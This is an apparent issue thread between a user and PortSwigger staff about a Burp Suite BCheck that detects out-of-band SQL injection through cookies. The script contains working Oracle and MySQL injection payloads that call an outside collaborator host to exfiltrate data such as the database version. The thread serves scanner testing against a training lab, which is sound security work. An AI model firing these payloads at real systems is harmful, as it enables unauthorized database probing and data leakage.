[If any interaction] Didn't create the finding to burp dashboard

[abdilahrf]

Hi, I am creating this bcheck to detect OOB SQL Injection within cookie insertion point I saw the DNS call within burp collaborator but the issue is not created to burpsuite dashboard.

metadata:
    language: v1-beta
    name: "HOSTS OOB SQL Injection"
    description: "Hosts OOB SQL Injection"
    author: "Abdilahrf"

run for each:
    payloads = 
        `1 AND 1=UTL_INADDR.get_host_addr('http://{generate_collaborator_address()}')`,
        `1 AND SELECT LOAD_FILE(concat('\\\\',@@version, '.{generate_collaborator_address()}/'))`,
        `x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://{generate_collaborator_address()}/"> %remote;]>'),'/l') FROM dual--`

# we will automatically insert into nested insertion points
given cookie insertion point then

    # only run succesful base response code
    if {base.response.status_code} is "200" then
        send payload called weaponized:
            appending: {payloads}

        # If we found error message to specific database
        if any interactions then
            report issue:
                severity: high
                confidence: certain
                detail: `We found OOB SQL Injection {payloads}`
        end if 
    end if

[PortSwiggerWiener]

Hi,

Was the interaction synchronous or asynchronous? Currently BChecks only support the former, i.e. it polls whilst executing the BCheck and any subsequent interactions will not be reported.

[abdilahrf]

I believe it was synchronous, Testing this using portswigger labs for OOB SQL Injection https://portswigger.net/web-security/learning-paths/sql-injection/sql-injection-exploiting-blind-sql-injection-using-out-of-band-oast-techniques/sql-injection/blind/lab-out-of-band

[Michelle-PortSwigger]

Thanks for the update. We suspect this could be a timing issue, so we'll run some tests here and be in touch later this week to let you know how we're getting on.

[Michelle-PortSwigger]

Having said that, I'm back with a few more checks already :). I've just been doing some tests using your BCheck against the lab 'Blind SQL injection with out-of-band interaction' and it has been reporting an issue for me when I use the 'Run test' functionality from the BCheck editor in our latest early Adopter version, 2023.10.2. Which specific lab were you using for your testing? If you can let me know I'll check against the same one.

[abdilahrf]

Its weird, now its working and creating the issue found thanks @Michelle-PortSwigger .